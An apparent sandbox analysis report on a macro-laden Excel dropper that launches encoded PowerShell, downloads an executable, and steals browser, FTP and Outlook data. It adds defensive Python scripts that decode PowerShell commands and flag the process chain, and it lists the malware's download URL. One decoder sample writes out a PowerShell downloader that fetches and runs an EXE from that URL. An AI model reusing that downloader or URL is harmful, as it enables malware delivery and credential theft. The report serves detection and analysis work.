Analysis

  • max time kernel
    121s
  • max time network
    146s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    25-11-2021 16:54

General

  • Target

    CSOIYQRONAGPE1.xlsm

  • Size

    102KB

  • MD5

    cc1439b54aa4b3db324fb921b94870ef

  • SHA1

    33a4c8af524b8e37f290000c654d897b440fd86c

  • SHA256

    95b3882e2ba6d5f35be8c35aa3d047e41ec110eb7f8aa69af7652f1cc29a6fb7

  • SHA512

    a9fb3881f480ca8dd86bb707b8216b596f4a848e25c797c15fb6c57b517beafe1fb2ddeb2d56321faf17e049bae4147582fd4052e7e1153962c0f7a6085fd4dc

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs (exe.dropper)
    http://18.192.215.191/team/z/CSOIYQRONAGPE1.exe
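The `ps1` config above was recovered from the `-enc` argument on the powershell.exe line in the process tree. PowerShell's -EncodedCommand takes base64 of the UTF-16LE script, not UTF-8, so a plain base64 decode yields text interleaved with NUL bytes. The decoder and classifier below is an added example, not part of the report or of the sample; the real encoded command is redacted in the report, so the script it decodes is a constructed stand-in that only shares the report's URL, while its variable names, drop path and cmdlets are assumptions.

```python
import base64
import re

# Constructed sample: a minimal PowerShell downloader of the shape the report's
# config extractor labels "exe.dropper". The sample's real encoded command is
# redacted in the report; only the URL is taken from it, the variable names,
# drop path and cmdlets are assumptions for illustration.
SAMPLE_SCRIPT = (
    "$u='http://18.192.215.191/team/z/CSOIYQRONAGPE1.exe';"
    "$p=\"$env:APPDATA\\Khlmdccppqkpdqrfhwdjw.exe\";"
    "(New-Object Net.WebClient).DownloadFile($u,$p);"
    "Start-Process $p"
)

# powershell.exe -EncodedCommand (abbreviated -e/-ec/-enc) takes the script as
# base64 of its UTF-16LE bytes.
ENC_FLAG_RE = re.compile(
    r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
URL_RE = re.compile(r"""https?://[^\s'"<>()]+""", re.IGNORECASE)
DOWNLOAD_RE = re.compile(
    r"DownloadFile|DownloadString|DownloadData|Invoke-WebRequest|\biwr\b|Start-BitsTransfer",
    re.IGNORECASE)
EXEC_RE = re.compile(r"Start-Process|Invoke-Expression|\biex\b|Invoke-Item|\bsaps\b",
                     re.IGNORECASE)


def encode_command(script: str) -> str:
    """Build the argument PowerShell expects after -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(encoded: str) -> str:
    """Inverse of encode_command. Re-adds '=' padding, which is often lost
    when the blob is copied out of a log line or a report."""
    padded = encoded + "=" * (-len(encoded) % 4)
    return base64.b64decode(padded).decode("utf-16-le")


def extract_urls(script: str) -> list:
    return sorted(set(URL_RE.findall(script)))


def analyze_cmdline(cmdline: str) -> dict:
    """Decode a powershell.exe command line and classify it the way the
    report's config table does: language, deobfuscated script, URLs and an
    exe.dropper verdict (fetches a .exe URL and then runs something)."""
    m = ENC_FLAG_RE.search(cmdline)
    script = decode_command(m.group(1)) if m else cmdline
    urls = extract_urls(script)
    dropper = (any(u.lower().endswith(".exe") for u in urls)
               and DOWNLOAD_RE.search(script) is not None
               and EXEC_RE.search(script) is not None)
    return {"encoded": m is not None, "language": "ps1",
            "deobfuscated": script, "urls": urls, "exe_dropper": dropper}


if __name__ == "__main__":
    line = "powershell.exe -win 1 -enc " + encode_command(SAMPLE_SCRIPT)
    print(analyze_cmdline(line))
```

The dropper verdict deliberately requires both a download primitive and an execution primitive in the decoded text; a script that only fetches a .exe, or only calls Start-Process on an existing file, is reported with its URLs but not labelled exe.dropper.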

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro. Here the parent is EXCEL.EXE (PID 2716) launching cmd.exe to run Vpxldboqapmd.bat, which the macro wrote to the Documents folder.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Deletes itself 1 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 22 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\CSOIYQRONAGPE1.xlsm"
    1⤵
    • Deletes itself
    • Checks processor information in registry
    • Enumerates system info in registry
    • NTFS ADS
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious behavior: RenamesItself
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2716
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\Vpxldboqapmd.bat
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:872
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -win 1 -enc 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
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2808
        • C:\Users\Admin\AppData\Roaming\Khlmdccppqkpdqrfhwdjw.exe
          "C:\Users\Admin\AppData\Roaming\Khlmdccppqkpdqrfhwdjw.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2112
          • C:\Users\Admin\AppData\Local\Temp\Khlmdccppqkpdqrfhwdjw.exe
            C:\Users\Admin\AppData\Local\Temp\Khlmdccppqkpdqrfhwdjw.exe
            5⤵
            • Executes dropped EXE
            PID:1656
          • C:\Users\Admin\AppData\Local\Temp\Khlmdccppqkpdqrfhwdjw.exe
            C:\Users\Admin\AppData\Local\Temp\Khlmdccppqkpdqrfhwdjw.exe
            5⤵
            • Executes dropped EXE
            • Accesses Microsoft Outlook profiles
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • outlook_office_path
            • outlook_win_path
            PID:1288
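The tree above runs EXCEL.EXE -> cmd.exe -> powershell.exe -enc -> a dropped EXE in Roaming that relaunches a same-named copy of itself from Temp twice, with SetThreadContext and WriteProcessMemory flagged on the Roaming parent. The script below is an added triage example, not part of the report, that turns those shapes into checks over process records transcribed from this tree. Parent PIDs are inferred from the tree's indentation because the report has no PPID column, and the redacted -enc blob is kept as "...".

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int      # 0 marks the root of the captured tree
    image: str
    cmdline: str


# Transcribed from the process tree in this report. The report shows PIDs and
# nesting but no PPID column, so ppid is read off the indentation; the
# redacted -enc blob is kept as "...".
PROCS = [
    Proc(2716, 0, r"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE",
         r'"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" '
         r'"C:\Users\Admin\AppData\Local\Temp\CSOIYQRONAGPE1.xlsm"'),
    Proc(872, 2716, r"C:\Windows\system32\cmd.exe",
         r"C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\Vpxldboqapmd.bat"),
    Proc(2808, 872, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -win 1 -enc ..."),
    Proc(2112, 2808, r"C:\Users\Admin\AppData\Roaming\Khlmdccppqkpdqrfhwdjw.exe",
         r'"C:\Users\Admin\AppData\Roaming\Khlmdccppqkpdqrfhwdjw.exe"'),
    Proc(1656, 2112, r"C:\Users\Admin\AppData\Local\Temp\Khlmdccppqkpdqrfhwdjw.exe",
         r"C:\Users\Admin\AppData\Local\Temp\Khlmdccppqkpdqrfhwdjw.exe"),
    Proc(1288, 2112, r"C:\Users\Admin\AppData\Local\Temp\Khlmdccppqkpdqrfhwdjw.exe",
         r"C:\Users\Admin\AppData\Local\Temp\Khlmdccppqkpdqrfhwdjw.exe"),
]

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe",
               "msaccess.exe", "mspub.exe", "onenote.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
                "certutil.exe", "bitsadmin.exe"}
USER_WRITABLE = ("\\appdata\\", "\\users\\public\\", "\\programdata\\",
                 "\\windows\\temp\\")
ENC_FLAG_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path. os.path.basename on a POSIX
    analysis host would not split on backslashes, so split by hand."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def ancestry(procs, pid):
    """Image names from the tree root down to pid, e.g. for an alert line."""
    by_pid = {p.pid: p for p in procs}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain[::-1]


def triage_tree(procs):
    """Return (rule, *pids) tuples for the four patterns this tree exhibits."""
    by_pid = {p.pid: p for p in procs}
    findings = []
    for p in procs:
        name = basename(p.image)
        parent = by_pid.get(p.ppid)
        if parent is not None:
            pname = basename(parent.image)
            # Office app spawning a shell/script host: the report's
            # "Process spawned unexpected child process" signature.
            if pname in OFFICE_APPS and name in SCRIPT_HOSTS:
                findings.append(("office_spawns_script_host", parent.pid, p.pid))
            # A binary relaunching a same-named copy of itself from another
            # directory. Together with SetThreadContext/WriteProcessMemory on
            # the parent, as the report flags on PID 2112, this is the shape
            # of process hollowing; the tree alone only marks a candidate.
            if pname == name and parent.image.lower() != p.image.lower():
                findings.append(("same_name_child_other_dir", parent.pid, p.pid))
        if name in ("powershell.exe", "pwsh.exe") and ENC_FLAG_RE.search(p.cmdline):
            findings.append(("encoded_powershell", p.pid))
        # "Executes dropped EXE": image lives in a user-writable location.
        if any(d in p.image.lower() for d in USER_WRITABLE):
            findings.append(("exec_from_user_writable", p.pid))
    return findings


if __name__ == "__main__":
    for finding in triage_tree(PROCS):
        print(finding)
    print(" > ".join(ancestry(PROCS, 1288)))
```

The same checks apply unchanged to Sysmon Event ID 1 or EDR process-creation records once they are mapped onto `Proc`; the transcription here is only so the script runs against this report offline. Note that the two Temp children (PIDs 1656 and 1288) look identical at the tree level; only the second one goes on to read Outlook profiles, which the tree does not show and which is why the hollowing check is reported as a candidate rather than a verdict.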

Network

MITRE ATT&CK Matrix (ATT&CK v6)

  • Credential Access
    Credentials in Files (T1081): 3
  • Discovery
    Query Registry (T1012): 2
    System Information Discovery (T1082): 2
  • Collection
    Data from Local System (T1005): 3
    Email Collection (T1114): 1

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Khlmdccppqkpdqrfhwdjw.exe.log
    MD5

    cc46a3a52a041a89732c2ec30a9651e3

    SHA1

    d2be4fb16cf40bdaf751ffb54937be0b566c3aed

    SHA256

    8b50302a8f47723cd8e4fae2f86ad219c21030f240941aa1f3c0ca08c73a70b9

    SHA512

    b7975573ddaa1fcfa4c63c7cf7ccb96680b69a2ffaf449c4729760423ecd5470185daf207c9c795d91a4631021bc331fc6a5fa834270bfbdac236262d6835fa8

  • C:\Users\Admin\AppData\Local\Temp\Khlmdccppqkpdqrfhwdjw.exe
    MD5

    a28c434e703d9d0961f526f87a61109c

    SHA1

    c18ce22d993ee202d7c4e91aeda8f602a1ddb054

    SHA256

    1a58c708f0c8b203949c9f180813f7fd6665b2f7bbf6f474b39d94e3d6638a30

    SHA512

    a380bd060f69d0813fa1c1141fc960225fbeb1a13195ed7349a2d0f7d3ad72e9b37df4f2f8afe45ac8b6bf4997fdc5bac69d9ec93123a1ef5e8f0871dc29e72d

  • C:\Users\Admin\AppData\Roaming\Khlmdccppqkpdqrfhwdjw.exe
    MD5

    a28c434e703d9d0961f526f87a61109c

    SHA1

    c18ce22d993ee202d7c4e91aeda8f602a1ddb054

    SHA256

    1a58c708f0c8b203949c9f180813f7fd6665b2f7bbf6f474b39d94e3d6638a30

    SHA512

    a380bd060f69d0813fa1c1141fc960225fbeb1a13195ed7349a2d0f7d3ad72e9b37df4f2f8afe45ac8b6bf4997fdc5bac69d9ec93123a1ef5e8f0871dc29e72d

  • C:\Users\Admin\Documents\Vpxldboqapmd.bat
    MD5

    eb57c3c8f7622d52e5ea78fcbcf2d9b2

    SHA1

    ec417981a3089cb8c72a78fbff71051fb8bd20d0

    SHA256

    ec93f90790e65f73486f769f4ae33aea3f099f06ae20febdffa2e91b5abb289d

    SHA512

    a6873254a3fc69cbd6234d3b6cdf780ece9ac498eecbcc9adef4c4274f5288dbc0bf5a89d016a8730569913b8c00edd93b390f0b46c3c1a6ba235c6f4200805f

  • memory/872-266-0x0000000000000000-mapping.dmp
  • memory/1288-335-0x0000000004FD0000-0x00000000054CE000-memory.dmp
    Filesize

    5.0MB

  • memory/1288-327-0x00000000004204CE-mapping.dmp
  • memory/2112-311-0x0000000005860000-0x0000000005D5E000-memory.dmp
    Filesize

    5.0MB

  • memory/2112-301-0x0000000000000000-mapping.dmp
  • memory/2716-121-0x0000020276260000-0x0000020276262000-memory.dmp
    Filesize

    8KB

  • memory/2716-122-0x0000020276260000-0x0000020276262000-memory.dmp
    Filesize

    8KB

  • memory/2716-115-0x00007FFD922E0000-0x00007FFD922F0000-memory.dmp
    Filesize

    64KB

  • memory/2716-120-0x0000020276260000-0x0000020276262000-memory.dmp
    Filesize

    8KB

  • memory/2716-119-0x00007FFD922E0000-0x00007FFD922F0000-memory.dmp
    Filesize

    64KB

  • memory/2716-118-0x00007FFD922E0000-0x00007FFD922F0000-memory.dmp
    Filesize

    64KB

  • memory/2716-117-0x00007FFD922E0000-0x00007FFD922F0000-memory.dmp
    Filesize

    64KB

  • memory/2716-116-0x00007FFD922E0000-0x00007FFD922F0000-memory.dmp
    Filesize

    64KB

  • memory/2808-300-0x000002583F3C6000-0x000002583F3C8000-memory.dmp
    Filesize

    8KB

  • memory/2808-291-0x000002583F3C3000-0x000002583F3C5000-memory.dmp
    Filesize

    8KB

  • memory/2808-290-0x000002583F3C0000-0x000002583F3C2000-memory.dmp
    Filesize

    8KB

  • memory/2808-268-0x0000000000000000-mapping.dmp